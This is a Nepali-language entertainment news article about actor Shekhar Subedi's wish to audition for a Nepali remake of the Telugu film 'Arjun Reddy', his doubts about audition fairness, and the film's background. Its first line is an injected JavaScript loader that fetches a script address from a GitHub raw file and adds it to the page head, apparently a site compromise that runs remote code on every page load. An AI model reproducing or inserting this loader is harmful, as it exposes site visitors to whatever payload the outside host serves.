;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौँ /
नेपाली चलचित्र क्षेत्रका उदाउँदा कलाकार शेखर सुबेदीले ‘अर्जुन रेड्डी’को नेपाली रिमेकका लागि १२ घण्टा पानी नखाई अडिसन दिन तयार रहेको बताएका छन् ।
झट्ट हेर्दा साउथ अभिनेता जस्तै देखिने सुवेदी सामाजिक सञ्जालमा अत्यन्तै लोकप्रिय अनुहार हो । केटिएम दैनिकमा प्रकाशित भएको उनको समाचार ४७ हजार भन्दा बढीले शेयर गरेका छन् ।
उनले भने, ‘यो फिल्मको अडिसनको लागि इतिहासकै ठुलो भिड हुने कुरामा दुई मत छैन, तर के अडिसनबाटै कलाकार छानिएलान् र ? यदि अडिसनबाटै कलाकार छानिने हो भने म १०० प्रतिशत दिने कोसिस गर्नेछु ।’
अडिसन प्रोटोकलको लागि मात्र हुने गरेको गुनासो गर्दै उनले भने, ‘मैले पनि धेरै चलचित्रको लागि अडिसन दिएको छु । तर मसँगै अडिसन दिन आउनु भएको कुनै पनि कलाकारलाई चलचित्रमा देख्न पाएको छैन । त्यसैले अलि अलि शङ्का उब्जनु स्वाभाविक नै हो ।’
अरू चलचित्र भन्दा भिन्न हुने हुनाले क्षमता वान कलाकारले मेन लिड पाओस् भन्ने उनको चाहना छ । यो फिल्मको लागि आफूले जस्तोसुकै मेहनत गर्न पनि तयार रहेको बताउने सुबेदीले घण्टौँ घाममा उभिएर परिश्रम गर्नेले राम्रो परिणाम पाउनु पर्ने बताए ।नक्कली दारी र कपाल हालेर अडिसन दिन आउने कलाकारहरूको पहिचान गरी सही र चरित्र सुहाउँदो व्यक्तिले मुख्य भूमिका पाओस् भन्ने उनको चाहना छ ।
सुपर हिट दक्षिण भारतीय तेलुगू फिल्म ‘अर्जुन रेड्डी’को नेपाली रिमेकका युवा फिल्मसले अडिसन गर्ने तयारी सुरु गरेपछि चलचित्र क्षेत्रका धेरैको नजर यस्को अडिसनमा परेको छ ।
एक वर्ष अगाडी देखि नै रिमेक बन्ने हल्ला चले पनि कोरोना कहरले यसको काम रोकिएको थियो । अहिले स्थिति सामान्य बन्दै आएकोले फिल्मका कलाकार छान्ने काम अघि बढाइएको हो। विशाल ‘सेल्फी किङ’का निर्देशक हुन्।
‘अर्जुन रेड्डी’को नेपाली रिमेक बन्ने समाचार केही महिना अघि नै बाहिरिएको थियो। अडिसनबाट फिल्मका मुख्य नायक, नायिका र अन्य केही कलाकार छानिने बताइएको छ।
दक्षिण भारतीय स्टार विजय देवगरकोन्डा अभिनीत यस फिल्मलाई सन्दीप रेड्डी भङगले निर्देशन गरेका थिए। फिल्मले बक्स अफिसमा ५१ मिलियन भारतीय मूल्य बराबर कमाइ गरेको भारतीय सञ्चार माध्यमले जनाएका छन्।
फेसबुक प्रतिक्रियाहरु